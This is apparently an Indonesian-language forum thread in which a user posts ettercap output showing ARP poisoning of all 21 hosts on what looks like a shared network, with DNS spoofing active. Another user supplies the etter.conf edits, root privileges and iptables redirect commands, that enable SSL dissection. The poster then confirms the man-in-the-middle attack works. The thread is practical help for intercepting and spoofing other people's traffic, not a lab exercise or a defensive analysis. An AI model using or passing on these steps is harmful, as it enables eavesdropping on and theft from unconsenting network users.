06-12-2012, 03:47 PM
(06-09-2012, 10:51 AM)xsan-lahci Wrote:(06-08-2012, 08:34 PM)reeyan_sheckler Wrote: permisi mau tanya,, w dah ikutin dr awal ttp kg bisa. nee penampakan'a.....,,,
wlan0 -> 00:06:25:02:FF8 192.168.10.241 255.255.255.0
SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...
28 plugins
40 protocol dissectors
55 ports monitored
7587 mac vendor fingerprint
1766 tcp OS fingerprint
2183 known services
Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %
21 hosts added to the hosts list...
ARP poisoning victims:
GROUP 1 : ANY (all the hosts in the list)
GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...
Text only Interface activated...
Hit 'h' for inline help
Activating dns_spoof plugin...
DHCP: [00:1F0:B0:C2:97] REQUEST 192.168.10.67
DHCP: [192.168.10.0] ACK : 192.168.10.67 255.255.255.0 GW 192.168.10.254 DNS 175.106.13.70 "serverusni"
DHCP: [00:1F0:B0:C2:97] DISCOVER
DHCP: [192.168.10.0] OFFER : 192.168.10.67 255.255.255.0 GW 192.168.10.254 DNS 175.106.13.70 "serverusni"
DHCP: [00:1F0:B0:C2:97] REQUEST 192.168.10.67
DHCP: [192.168.10.0] ACK : 192.168.10.67 255.255.255.0 GW 192.168.10.254 DNS 175.106.13.70 "serverusni"
DHCP: [192.168.10.0] ACK : 0.0.0.0 255.255.255.0 GW 192.168.10.254 DNS 175.106.13.70 "serverusni"
dns_spoof: [spynet2.microsoft.com] spoofed to [198.182.196.56]
DHCP: [00:1F0:B0:C2:97] REQUEST 192.168.10.67
DHCP: [192.168.10.0] ACK : 192.168.10.67 255.255.255.0 GW 192.168.10.254 DNS 175.106.13.70 "serverusni"
DHCP: [00:1F0:B3:3A:A4] DISCOVER
DHCP: [192.168.10.0] OFFER : 192.168.10.178 255.255.255.0 GW 192.168.10.254 DNS 175.106.13.70 "serverusni"
DHCP: [00:1F0:B3:3A:A4] REQUEST 192.168.10.178
DHCP: [192.168.10.0] ACK : 192.168.10.178 255.255.255.0 GW 192.168.10.254 DNS 175.106.13.70 "serverusni"
[/php]
nah sebelumnya pastikan etter.conf di edit dulu bang
coba ketik gedit /etc/etter.conf
lalu cari baris dan samakan seperti yang ada dibawah ini
[privs]
ec_uid = 0 # 65534 nobody is the default
ec_gid = 0 # 65534 nobody is the default
dan hilangkan tanda pagar pada baris redir_command_on dan redir_command_off terus liat yang warna kuning dibawah ini,itu kata-kata yang udah ane ilangin tanda pagernya bang jo
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
sip dah coba jalanin lagi ettercapnya
sipp dah bisa nee,, tenkyu